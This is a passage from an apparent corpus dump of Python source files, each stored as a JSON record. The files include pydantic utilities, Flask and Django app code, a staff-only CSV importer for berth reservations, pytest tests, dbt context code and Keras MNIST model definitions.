TypeVar('KeyType')\n\n\ndef deep_update(mapping: Dict[KeyType, Any], updating_mapping: Dict[KeyType, Any]) -> Dict[KeyType, Any]:\n updated_mapping = mapping.copy()\n for k, v in updating_mapping.items():\n if k in mapping and isinstance(mapping[k], dict) and isinstance(v, dict):\n updated_mapping[k] = deep_update(mapping[k], v)\n else:\n updated_mapping[k] = v\n return updated_mapping\n\n\ndef update_not_none(mapping: Dict[Any, Any], **update: Any) -> None:\n mapping.update({k: v for k, v in update.items() if v is not None})\n\n\ndef almost_equal_floats(value_1: float, value_2: float, *, delta: float = 1e-8) -> bool:\n \"\"\"\n Return True if two floats are almost equal\n \"\"\"\n return abs(value_1 - value_2) <= delta\n\n\ndef generate_model_signature(\n init: Callable[..., None], fields: Dict[str, 'ModelField'], config: Type['BaseConfig']\n) -> 'Signature':\n \"\"\"\n Generate signature for model based on its fields\n \"\"\"\n from inspect import Parameter, Signature, signature\n\n present_params = signature(init).parameters.values()\n merged_params: Dict[str, Parameter] = {}\n var_kw = None\n use_var_kw = False\n\n for param in islice(present_params, 1, None): # skip self arg\n if param.kind is param.VAR_KEYWORD:\n var_kw = param\n continue\n merged_params[param.name] = param\n\n if var_kw: # if custom init has no var_kw, fields which are not declared in it cannot be passed through\n allow_names = config.allow_population_by_field_name\n for field_name, field in fields.items():\n param_name = field.alias\n if field_name in 
merged_params or param_name in merged_params:\n continue\n elif not param_name.isidentifier():\n if allow_names and field_name.isidentifier():\n param_name = field_name\n else:\n use_var_kw = True\n continue\n\n # TODO: replace annotation with actual expected types once #1055 solved\n kwargs = {'default': field.default} if not field.required else {}\n merged_params[param_name] = Parameter(\n param_name, Parameter.KEYWORD_ONLY, annotation=field.outer_type_, **kwargs\n )\n\n if config.extra is config.extra.allow:\n use_var_kw = True\n\n if var_kw and use_var_kw:\n # Make sure the parameter for extra kwargs\n # does not have the same name as a field\n default_model_signature = [\n ('__pydantic_self__', Parameter.POSITIONAL_OR_KEYWORD),\n ('data', Parameter.VAR_KEYWORD),\n ]\n if [(p.name, p.kind) for p in present_params] == default_model_signature:\n # if this is the standard model signature, use extra_data as the extra args name\n var_kw_name = 'extra_data'\n else:\n # else start from var_kw\n var_kw_name = var_kw.name\n\n # generate a name that's definitely unique\n while var_kw_name in fields:\n var_kw_name += '_'\n merged_params[var_kw_name] = var_kw.replace(name=var_kw_name)\n\n return Signature(parameters=list(merged_params.values()), return_annotation=None)\n\n\ndef get_model(obj: Union[Type['BaseModel'], Type['DataclassType']]) -> Type['BaseModel']:\n from .main import BaseModel # noqa: F811\n\n try:\n model_cls = obj.__pydantic_model__ # type: ignore\n except AttributeError:\n model_cls = obj\n\n if not issubclass(model_cls, BaseModel):\n raise TypeError('Unsupported type, must be either BaseModel or dataclass')\n return model_cls\n\n\ndef to_camel(string: str) -> str:\n return ''.join(word.capitalize() for word in string.split('_'))\n\n\nclass PyObjectStr(str):\n \"\"\"\n String class where repr doesn't include quotes. Useful with Representation when you want to return a string\n representation of something that valid (or pseudo-valid) python.\n \"\"\"\n\n def __repr__(self) -> str:\n return str(self)\n\n\nclass Representation:\n \"\"\"\n Mixin to provide __str__, __repr__, and __pretty__ methods. See #884 for more details.\n\n __pretty__ is used by [devtools](https://python-devtools.helpmanual.io/) to provide human readable representations\n of objects.\n \"\"\"\n\n __slots__: Tuple[str, ...] 
= tuple()\n\n def __repr_args__(self) -> 'ReprArgs':\n \"\"\"\n Returns the attributes to show in __str__, __repr__, and __pretty__ this is generally overridden.\n\n Can either return:\n * name - value pairs, e.g.: `[('foo_name', 'foo'), ('bar_name', ['b', 'a', 'r'])]`\n * or, just values, e.g.: `[(None, 'foo'), (None, ['b', 'a', 'r'])]`\n \"\"\"\n attrs = ((s, getattr(self, s)) for s in self.__slots__)\n return [(a, v) for a, v in attrs if v is not None]\n\n def __repr_name__(self) -> str:\n \"\"\"\n Name of the instance's class, used in __repr__.\n \"\"\"\n return self.__class__.__name__\n\n def __repr_str__(self, join_str: str) -> str:\n return join_str.join(repr(v) if a is None else f'{a}={v!r}' for a, v in self.__repr_args__())\n\n def __pretty__(self, fmt: Callable[[Any], Any], **kwargs: Any) -> Generator[Any, None, None]:\n \"\"\"\n Used by devtools (https://python-devtools.helpmanual.io/) to provide a human readable representations of objects\n \"\"\"\n yield self.__repr_name__() + '('\n yield 1\n for name, value in self.__repr_args__():\n if name is not None:\n yield name + '='\n yield fmt(value)\n yield ','\n yield 0\n yield -1\n yield ')'\n\n def __str__(self) -> str:\n return self.__repr_str__(' ')\n\n def __repr__(self) -> str:\n return f'{self.__repr_name__()}({self.__repr_str__(\", \")})'\n\n\nclass GetterDict(Representation):\n \"\"\"\n Hack to make object's smell just enough like dicts for validate_model.\n\n We can't inherit from Mapping[str, Any] because it upsets cython so we have to implement all methods ourselves.\n \"\"\"\n\n __slots__ = ('_obj',)\n\n def __init__(self, obj: Any):\n self._obj = obj\n\n def __getitem__(self, key: str) -> Any:\n try:\n return getattr(self._obj, key)\n except AttributeError as e:\n raise KeyError(key) from e\n\n def get(self, key: Any, default: Any = None) -> Any:\n return getattr(self._obj, key, default)\n\n def extra_keys(self) -> Set[Any]:\n \"\"\"\n We don't want to get any other attributes of obj if the model didn't explicitly ask for them\n \"\"\"\n return set()\n\n def keys(self) -> List[Any]:\n \"\"\"\n Keys of the pseudo dictionary, uses a list not set so order information can be maintained like python\n dictionaries.\n \"\"\"\n return list(self)\n\n def values(self) -> List[Any]:\n return [self[k] for k in self]\n\n def items(self) -> Iterator[Tuple[str, Any]]:\n for k in self:\n yield k, self.get(k)\n\n def __iter__(self) -> Iterator[str]:\n for name in dir(self._obj):\n if not name.startswith('_'):\n yield name\n\n def __len__(self) -> int:\n return sum(1 for _ in self)\n\n def __contains__(self, item: Any) -> bool:\n return item in self.keys()\n\n def __eq__(self, other: Any) -> bool:\n return dict(self) == dict(other.items()) # type: ignore\n\n def __repr_args__(self) -> 'ReprArgs':\n return [(None, dict(self))] # type: ignore\n\n def __repr_name__(self) -> str:\n return f'GetterDict[{display_as_type(self._obj)}]'\n\n\nclass ValueItems(Representation):\n \"\"\"\n Class for more convenient calculation of excluded or included fields on values.\n \"\"\"\n\n __slots__ = ('_items', '_type')\n\n def __init__(self, value: Any, items: Union['AbstractSetIntStr', 'MappingIntStrAny']) -> None:\n if TYPE_CHECKING:\n self._items: Union['AbstractSetIntStr', 'MappingIntStrAny']\n self._type: Type[Union[set, dict]] # type: ignore\n\n # For further type checks speed-up\n if isinstance(items, dict):\n self._type = dict\n elif isinstance(items, AbstractSet):\n self._type = set\n else:\n raise TypeError(f'Unexpected type of exclude value 
{items.__class__}')\n\n if isinstance(value, (list, tuple)):\n try:\n items = self._normalize_indexes(items, len(value))\n except TypeError as e:\n raise TypeError(\n 'Excluding fields from a sequence of sub-models or dicts must be performed index-wise: '\n 'expected integer keys or keyword \"__all__\"'\n ) from e\n\n self._items = items\n\n @no_type_check\n def is_excluded(self, item: Any) -> bool:\n \"\"\"\n Check if item is fully excluded\n (value considered excluded if self._type is set and item contained in self._items\n or self._type is dict and self._items.get(item) is ...\n\n :param item: key or index of a value\n \"\"\"\n if self._type is set:\n return item in self._items\n return self._items.get(item) is ...\n\n @no_type_check\n def is_included(self, item: Any) -> bool:\n \"\"\"\n Check if value is contained in self._items\n\n :param item: key or index of value\n \"\"\"\n return item in self._items\n\n @no_type_check\n def for_element(self, e: 'IntStr') -> Optional[Union['AbstractSetIntStr', 'MappingIntStrAny']]:\n \"\"\"\n :param e: key or index of element on value\n :return: raw values for elemet if self._items is dict and contain needed element\n \"\"\"\n\n if self._type is dict:\n item = self._items.get(e)\n return item if item is not ... else None\n return None\n\n @no_type_check\n def _normalize_indexes(\n self, items: Union['AbstractSetIntStr', 'MappingIntStrAny'], v_length: int\n ) -> Union['AbstractSetIntStr', 'DictIntStrAny']:\n \"\"\"\n :param items: dict or set of indexes which will be normalized\n :param v_length: length of sequence indexes of which will be\n\n >>> self._normalize_indexes({0, -2, -1}, 4)\n {0, 2, 3}\n >>> self._normalize_indexes({'__all__'}, 4)\n {0, 1, 2, 3}\n \"\"\"\n if self._type is set:\n if '__all__' in items:\n if items != {'__all__'}:\n raise ValueError('set with keyword \"__all__\" must not contain other elements')\n return {i for i in range(v_length)}\n return {v_length + i if i < 0 else i for i in items}\n else:\n normalized_items = {v_length + i if i < 0 else i: v for i, v in items.items() if i != '__all__'}\n all_set = items.get('__all__')\n if all_set:\n for i in range(v_length):\n normalized_items.setdefault(i, set()).update(all_set)\n\n return normalized_items\n\n def __repr_args__(self) -> 'ReprArgs':\n return [(None, self._items)]\n"} {"ext": "py", "sha": "1a3119501271b19d5d2595d31873bd7a4496c209", "content": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\nfrom flask import Blueprint, render_template\n\nabout_blueprint = Blueprint('about', __name__)\n\n\n@about_blueprint.route(\"/catalog/about\")\ndef about():\n \"\"\"Show about page.\"\"\"\n return render_template(\"about.html\")\n"} {"ext": "py", "sha": "1a311b204dd69d09d8dc8a2fc1e8e572b9ab0cf8", "content": "# _____ ______ _____ \n# / ____/ /\\ | ____ | __ \\\n# | | / \\ | |__ | |__) | Caer - Modern Computer Vision\n# | | / /\\ \\ | __| | _ / Languages: Python, C, C++, Cuda\n# | |___ / ____ \\ | |____ | | \\ \\ http://github.com/jasmcaus/caer\n# \\_____\\/_/ \\_ \\______ |_| \\_\\\n\n# Licensed under the MIT License <http://opensource.org/licenses/MIT>\n# SPDX-License-Identifier: MIT\n# Copyright (c) 2020-2021 The Caer Authors <http://github.com/jasmcaus>\n\n\nfrom threading import Thread\nimport time\nimport math\nfrom queue import Queue\nimport cv2 as cv\n\nfrom .constants import FRAME_COUNT, FPS\n\n__all__ = [\n 'GPUFileStream'\n]\n\n\nclass GPUFileStream:\n r\"\"\"\n This is an auxiliary class that enables Video Streaming using the GPU for caer with minimalistic latency, 
and at the expense of little to no additional computational requirements.\n \n The basic idea behind it is to tracks and save the salient feature array for the given number of frames and then uses these anchor point to cancel out all perturbations relative to it for the incoming frames in the queue. This class relies heavily on **Threaded Queue mode** for error-free & ultra-fast frame handling.\n\n Args:\n source (int, str): Source path for the video. If ``source=0``, the default camera device is used. For \n multiple external camera devices, use incremented values. For eg: ``source=1`` represents the second camera device on your system.\n qsize (int): Default queue size for handling the video streams. Default: 128.\n \"\"\"\n\n def __init__(self, source, qsize=128):\n \"\"\"\n Source must be a path to a video file\n Utilizes your system's GPU to process the stream\n \"\"\"\n\n if not isinstance(source, str):\n raise ValueError(f'Expected either a filepath. Got {type(source)}. Consider using VideoStream which supports both live video as well as pre-existing videos')\n\n # initialize the file video stream along with the boolean\n # used to indicate if the thread should be stopped or not\n self.stream = cv.VideoCapture(source)\n self.kill_stream = False\n self.count = 0\n\n # initialize the queue to store frames\n self.Q = Queue(maxsize=qsize)\n\n self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))\n self.res = (self.width, self.height)\n\n self.fps = math.ceil(self.stream.get(FPS))\n self.frames = int(self.stream.get(FRAME_COUNT))\n \n # since we use UMat to store the images to\n # we need to initialize them beforehand\n self.qframes = [0] * qsize\n for ii in range(qsize):\n self.qframes[ii] = cv.UMat(self.height, self.width, cv.CV_8UC3)\n\n\n def begin_stream(self):\n # start a thread to read frames from the file video stream\n t = Thread(target=self.update, args=())\n t.daemon = True\n t.start()\n return self\n\n\n def update(self):\n # keep looping infinitely\n while True:\n if self.kill_stream:\n return\n\n # otherwise, ensure the queue has room in it\n if not self.Q.full():\n self.count += 1\n target = (self.count-1) % self.Q.maxsize\n ret = self.stream.grab()\n\n if not ret:\n self.release()\n return \n\n self.stream.retrieve(self.qframes[target])\n\n # add the frame to the queue\n self.Q.put(target)\n\n\n def read(self):\n while (not self.more() and self.kill_stream):\n time.sleep(0.1)\n # return next frame in the queue\n return self.qframes[self.Q.get()]\n\n\n def more(self):\n # return True if there are still frames in the queue\n return self.Q.qsize() > 0\n\n\n def release(self):\n self.kill_stream = True\n # wait until stream resources are released\n self.thread.join()\n\n\n # Gets frame count\n def count_frames(self):\n if not self.kill_stream and not self.live_video:\n return self.frames\n # if get_opencv_version() == '2':\n # return int(self.stream.get(FRAME_COUNT_DEPR))\n # else:\n # return int(self.stream.get(FRAME_COUNT))\n \n\n if self.live_video:\n print('[WARNING] Frames cannot be computed on live streams')\n return -1\n\n\n # Gets FPS count\n def get_fps(self):\n if not self.kill_stream:\n return self.fps\n\n # Get frame dimensions\n def get_res(self):\n return self.res"} {"ext": "py", "sha": "1a311b8d1c0f185243f288a50fdddfc7fdeb848f", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n 
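    # Builds on api.0007_apirequest_extra and adds a nullable, non-editable
    # api_client CharField (max_length=50) so each ApiRequest records the client that made it.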
dependencies = [\n ('api', '0007_apirequest_extra'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='apirequest',\n name='api_client',\n field=models.CharField(null=True, editable=False, max_length=50),\n preserve_default=True,\n ),\n ]\n"} {"ext": "py", "sha": "1a311cc6d7ebf838a7a232773174002e36b9c602", "content": "#-*- coding:utf-8 -*-\n\nimport pytest\n\nimport random\nimport string\nimport itertools as itt\nimport collections\n\nimport spiceminer as sm\nimport spiceminer.kernel.lowlevel as lowlevel\n\n\n### Helpers ###\ndef rstrings(max_size):\n while True:\n yield ''.join(random.sample(string.lowercase, random.randint(1, max_size)))\n\nclass FakeKernel(object):\n def __init__(self, path):\n self.path = path\n self.loaded = True\n\n def _unload(self):\n self.loaded = False\n\n@pytest.fixture(scope='function')\ndef fake_LOADED(kernelfiles, monkeypatch):\n available = random.sample(kernelfiles, random.randint(0, len(kernelfiles)))\n substitute = {FakeKernel(path) for path in available}\n monkeypatch.setattr(lowlevel, 'LOADED_KERNELS', substitute)\n return substitute\n\n@pytest.fixture(scope='function')\ndef fake_loaders(monkeypatch):\n '''Patch lowlevel loader functions to rerturn dummy results.'''\n def fake_loader(path):\n windows = {'ABC': 'Test'}\n return windows\n for func in ('_load_sp', '_load_pc', '_load_c', '_load_f'):\n monkeypatch.setattr(lowlevel, func, fake_loader)\n\n@pytest.fixture(scope='function')\ndef fake_furnsh(monkeypatch):\n monkeypatch.setattr(lowlevel.spice, 'furnsh', lambda x: None)\n monkeypatch.setattr(lowlevel.spice, 'unload', lambda x: None)\n\n\n### Tests ###\nclass TestKernelProperties(object):\n def test_kp_good(self, kernelfile):\n kprops = lowlevel.kernel_properties(kernelfile)\n assert kprops.path == kernelfile\n assert kprops.arch in lowlevel.ARCH\n assert kprops.type in lowlevel.KTYPE\n\n def test_kp_bad(self, nonkernelfile):\n with pytest.raises((ValueError, sm.SpiceError)):\n kprops = lowlevel.kernel_properties(nonkernelfile)\n\n@pytest.mark.parametrize('ktype', list(lowlevel.KTYPE) + list(\n set(itt.islice(rstrings(10), 5)) - lowlevel.KTYPE\n))\ndef test_info_type(ktype):\n info = lowlevel._info_type(ktype)\n if ktype in lowlevel.KTYPE:\n assert info in ('pos', 'rot', 'none')\n else:\n assert info == None\n\nxValueError = pytest.mark.xfail(raises=ValueError)\n@pytest.mark.parametrize('arch', list(lowlevel.ARCH) + [xValueError('?')])\n@pytest.mark.parametrize('ktype', list(lowlevel.KTYPE) + [\n xValueError(next(rstrings(10)))\n])\ndef test_validate(arch, ktype):\n lowlevel._validate('Test', arch, ktype)\n\n@pytest.mark.parametrize('recursive', [True, False])\ndef test_icollect_kprops(datadir, kernelfiles, recursive):\n paths = set(kp.path for kp in lowlevel.icollect_kprops(datadir, recursive, False))\n if not recursive:\n assert len(paths) < len(kernelfiles)\n assert paths - set(kernelfiles) == set()\n\ndef test_ifilter_kprops(kernelfiles, fake_LOADED):\n kp = collections.namedtuple('KernelPath', 'path')\n result = lowlevel.ifilter_kprops(kp(path) for path in kernelfiles)\n result_paths = set(kprops.path for kprops in result)\n fake_paths = set(k.path for k in fake_LOADED)\n assert result_paths.symmetric_difference(fake_paths) == set(kernelfiles)\n\ndef test_iunload_kprops(kernelfiles, fake_LOADED):\n kp = collections.namedtuple('KernelPath', 'path')\n result = lowlevel.iunload_kprops(kp(path) for path in kernelfiles)\n result_paths = set(kprops.path for kprops in result)\n assert result_paths == set(kernelfiles)\n unloaded_paths = 
{k.path for k in fake_LOADED if not k.loaded}\n assert len(unloaded_paths) == len(fake_LOADED)\n\n@pytest.mark.parametrize('types', [\n [random.choice(list(lowlevel.KTYPE)) for i in range(10)]\n])\ndef test_split_kprops(types):\n kt = collections.namedtuple('KernelType', 'type')\n kpmisc, kpbody = lowlevel.split_kprops(kt(t) for t in types)\n body_types = {kt.type for kt in kpbody}\n misc_types = {kt.type for kt in kpmisc}\n assert body_types.union(lowlevel.KTYPE_BODY) == lowlevel.KTYPE_BODY\n assert misc_types.intersection(lowlevel.KTYPE_BODY) == set()\n assert body_types.union(misc_types) == set(types)\n\n\n\n\n@pytest.mark.usefixtures('fake_loaders', 'fake_furnsh')\ndef test_load_any(kernelfile):\n kp = collections.namedtuple('KernelProperties', ['path', 'type'])\n kprops = kp(kernelfile, random.choice(list(lowlevel.KTYPE)))\n time_window_map = lowlevel.load_any(kprops)\n if kprops.type in lowlevel.KTYPE_BODY:\n assert time_window_map == {'ABC': 'Test'}\n else:\n assert time_window_map == {}\n\ndef test_unload_any():\n pass\n\n\n@pytest.mark.parametrize('path', ['.'])\ndef test_load_dummy(path):\n assert lowlevel._load_dummy(path) == {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_sp(spfile):\n time_window_map = lowlevel._load_sp(spfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds', 'with_spacecraftclock')\ndef test_load_c(cfile):\n time_window_map = lowlevel._load_c(cfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_pc(pcfile):\n time_window_map = lowlevel._load_pc(pcfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_f(ffile):\n time_window_map = lowlevel._load_f(ffile)\n assert time_window_map != {}\n"} {"ext": "py", "sha": "1a311d152bedbd39e32d9587e27a033a2aa95be0", "content": "def myprint():\n \n print('myprint: ' + s)\n\ns = 'I am global variable'\nprint(s)\nmyprint()"} {"ext": "py", "sha": "1a311d7c0922e41259749d2de354c8d21f97df0b", "content": "from typing import Any, Dict\n\nfrom dbt.contracts.connection import HasCredentials\n\nfrom dbt.context.base import (\n BaseContext, contextproperty\n)\n\n\nclass TargetContext(BaseContext):\n # subclass is ConfiguredContext\n def __init__(self, config: HasCredentials, cli_vars: Dict[str, Any]):\n super().__init__(cli_vars=cli_vars)\n self.config = config\n\n @contextproperty\n def target(self) -> Dict[str, Any]:\n \"\"\"`target` contains information about your connection to the warehouse\n (specified in profiles.yml). Some configs are shared between all\n adapters, while others are adapter-specific.\n\n Common:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | name | dev | Name of the active target |\n |----------|-----------|------------------------------------------|\n | schema | dbt_alice | Name of the dbt schema (or, dataset on |\n | | | BigQuery) |\n |----------|-----------|------------------------------------------|\n | type | postgres | The active adapter being used. 
|\n |----------|-----------|------------------------------------------|\n | threads | 4 | The number of threads in use by dbt |\n |----------|-----------|------------------------------------------|\n\n Snowflake:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | database | RAW | The active target's database. |\n |----------|-----------|------------------------------------------|\n | warehouse| TRANSFORM | The active target's warehouse. |\n |----------|-----------|------------------------------------------|\n | user | USERNAME | The active target's user |\n |----------|-----------|------------------------------------------|\n | role | ROLENAME | The active target's role |\n |----------|-----------|------------------------------------------|\n | account | abc123 | The active target's account |\n |----------|-----------|------------------------------------------|\n\n Postgres/Redshift:\n\n |----------|-------------------|----------------------------------|\n | Variable | Example | Description |\n |----------|-------------------|----------------------------------|\n | dbname | analytics | The active target's database. |\n |----------|-------------------|----------------------------------|\n | host | abc123.us-west-2. | The active target's host. |\n | | redshift.amazonaws| |\n | | .com | |\n |----------|-------------------|----------------------------------|\n | user | dbt_user | The active target's user |\n |----------|-------------------|----------------------------------|\n | port | 5439 | The active target's port |\n |----------|-------------------|----------------------------------|\n\n BigQuery:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | project | abc-123 | The active target's project. 
|\n |----------|-----------|------------------------------------------|\n\n \"\"\"\n return self.config.to_target_dict()\n\n\ndef generate_target_context(\n config: HasCredentials, cli_vars: Dict[str, Any]\n) -> Dict[str, Any]:\n ctx = TargetContext(config, cli_vars)\n return ctx.to_dict()\n"} {"ext": "py", "sha": "1a311dcf3bca504bc6bedd9da792a511696e9de5", "content": "import json\nimport datetime\nfrom django.utils import timezone\nfrom django.core.exceptions import PermissionDenied\nfrom rest_framework import permissions, generics\nfrom resources.models import Unit, Reservation, Resource, ResourceType\nfrom hmlvaraus.models.hml_reservation import HMLReservation\nfrom hmlvaraus.models.berth import Berth\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\nfrom django.utils.dateparse import parse_datetime\nimport pytz\n\nclass ImporterView(generics.CreateAPIView):\n base_name = 'importer'\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request):\n request_user = request.user\n\n if not request_user.is_staff:\n raise PermissionDenied()\n\n uploaded_file = request.data['file']\n data = uploaded_file.read().decode(\"utf-8\")\n\n data_rows = data.split('\\n')\n\n # Kohteet\n if data_rows[0][0] == '1':\n del data_rows[1]\n del data_rows[0]\n for row in data_rows:\n fields = row.split(';')\n\n try:\n print('Kohdedataa')\n a = fields[5]\n except:\n continue\n\n location = None\n if fields[5] and fields[5] != '':\n location = fields[5].split(',')\n coordinates = []\n for coord in location:\n coord = coord.strip()\n coord = float(coord)\n coordinates = [coord] + coordinates\n\n location = GEOSGeometry(json.dumps({'type': 'Point', 'coordinates': coordinates}))\n Unit.objects.get_or_create(name=fields[0], street_address=fields[1], address_zip=fields[2], email=fields[3], phone=fields[4], location=location, description=fields[6])\n\n\n # Venepaikat\n if data_rows[0][0] == '2':\n del data_rows[1]\n del data_rows[0]\n for row in data_rows:\n fields = row.split(';')\n\n try:\n print('Venepaikkadataa, Kohde:', fields[0])\n unit = Unit.objects.get(name=fields[0]);\n except:\n continue\n\n resource_types = ResourceType.objects.all();\n for resource_type in resource_types:\n if 'vene' in resource_type.name.lower() or 'boat' in resource_type.name.lower():\n type_instance = resource_type\n\n resource = Resource.objects.get_or_create(unit=unit, name=fields[1], description=fields[2], type=type_instance, reservable=True)[0]\n is_disabled = False\n if fields[3] == 'kyllä':\n is_disabled = True\n price = 0\n if fields[4]:\n price = fields[4].replace(',', '.')\n price = float(price)\n\n type_mapping = {\n 'numero': 'number',\n 'laituri': 'dock',\n 'poletti': 'ground'\n }\n length = 0\n width = 0\n depth = 0\n if fields[5] and fields[5] != '':\n length = int(fields[5])\n if fields[6] and fields[6] != '':\n width = int(fields[6])\n if fields[7] and fields[7] != '':\n depth = int(fields[7])\n\n berth_type = type_mapping.get(fields[8].lower(), None)\n Berth.objects.get_or_create(resource=resource, is_disabled=is_disabled, price=price, length_cm=length, width_cm=width, depth_cm=depth, type=berth_type)\n\n\n # Varaukset\n if data_rows[0][0] == '3':\n del data_rows[1]\n del data_rows[0]\n for i, row in enumerate(data_rows):\n fields = row.split(';')\n try:\n print(i, 'Varausdataa, Kohde:', fields[1])\n unit = Unit.objects.get(name=fields[1])\n resource = Resource.objects.get(unit=unit, name=str(fields[0]), 
description=str(fields[4]))\n except:\n continue\n\n resource.reservable = False\n\n berth = Berth.objects.get(resource=resource)\n begin = parse_datetime(str(fields[2]) + ' 00:00:00')\n begin = pytz.timezone(\"Europe/Helsinki\").localize(begin, is_dst=None)\n end = parse_datetime(str(fields[3]) + ' 00:00:00')\n end = pytz.timezone(\"Europe/Helsinki\").localize(end, is_dst=None)\n\n state = 'confirmed'\n state_updated_at = timezone.now()\n is_paid = False\n is_paid_at = None\n if fields[5] and fields[5].strip() != '':\n state_updated_at = datetime.datetime.strptime(fields[5], \"%d.%m.%Y %H:%M\")\n state = 'cancelled'\n\n if fields[6] and fields[6].strip() != '':\n is_paid_at = datetime.datetime.strptime(fields[6], \"%d.%m.%Y %H:%M\")\n is_paid = True\n\n\n reservation = Reservation.objects.create(\n resource=resource,\n begin=begin,\n end=end,\n event_description=fields[4] or '',\n state=state,\n reserver_name=fields[7] or '',\n reserver_email_address=fields[8] or '',\n reserver_phone_number=fields[9] or '',\n reserver_address_street=fields[10] or '',\n reserver_address_city=fields[11] or '',\n reserver_address_zip=fields[12] or '',\n )\n\n HMLReservation.objects.get_or_create(reservation=reservation, berth=berth, state_updated_at=state_updated_at, is_paid_at=is_paid_at, is_paid=is_paid)\n resource.save()\n\n return Response(\n status=status.HTTP_201_CREATED\n )\n"} {"ext": "py", "sha": "1a311def484d912295ffd2dc48724e092b31100f", "content": "#!/usr/bin/env python3\nfrom training import *\nfrom datasets import load_mnist_data as load_data\n\ndef make_tiny_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(6, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(32),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_small_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(42),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_small_maxp_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(42),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_medium_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(5, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(5, (5, 5)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(3, (7, 7)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(64),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_large_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(32, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(16, (5, 5)),\n tf.keras.layers.Activation('relu'),\n 
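        # Channel count shrinks (32 -> 16 -> 8) while the kernel size grows, and there is no
        # pooling or regularisation; the commented-out 'mnist_overfitting' run below uses this
        # model with early stopping disabled, presumably to demonstrate overfitting.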
tf.keras.layers.Conv2D(8, (7, 7)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(256),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(64),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\n# classifier (load_data, make_tiny_model,\n# model_name = 'mnist_tiny',\n# epochs = 20)\n\n# classifier (load_data, make_small_model,\n# model_name = 'mnist_small',\n# epochs = 20)\n\n# classifier (load_data, make_small_model,\n# model_name = 'mnist_small_overfitting',\n# early_stopping = False,\n# epochs = 50)\n\nclassifier (load_data, make_small_maxp_model,\n model_name = 'mnist_small_maxp',\n epochs = 20)\n\n# classifier (load_data, make_medium_model,\n# model_name = 'mnist_medium',\n# epochs = 20)\n\n# classifier (load_data, make_large_model,\n# model_name = 'mnist_overfitting',\n# early_stopping = False,\n# epochs = 20)\n"} {"ext": "py", "sha": "1a311f8c96d103e999b09e38d691bbd0be6cbbb1", "content": "\"\"\"Gaussian MLP Policy.\n\nA policy represented by a Gaussian distribution\nwhich is parameterized by a multilayer perceptron (MLP).\n\"\"\"\n# pylint: disable=wrong-import-order\nimport akro\nimport numpy as np\nimport tensorflow as tf\n\nfrom garage.tf.models import GaussianMLPModel\nfrom garage.tf.policies.policy import StochasticPolicy\n\n\nclass GaussianMLPPolicy(StochasticPolicy):\n \"\"\"Gaussian MLP Policy.\n\n A policy represented by a Gaussian distribution\n which is parameterized by a multilayer perceptron (MLP).\n\n Args:\n env_spec (garage.envs.env_spec.EnvSpec): Environment specification.\n name (str): Model name, also the variable scope.\n hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for mean. For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n hidden_nonlinearity (callable): Activation function for intermediate\n dense layer(s). It should return a tf.Tensor. Set it to\n None to maintain a linear activation.\n hidden_w_init (callable): Initializer function for the weight\n of intermediate dense layer(s). The function should return a\n tf.Tensor.\n hidden_b_init (callable): Initializer function for the bias\n of intermediate dense layer(s). The function should return a\n tf.Tensor.\n output_nonlinearity (callable): Activation function for output dense\n layer. It should return a tf.Tensor. Set it to None to\n 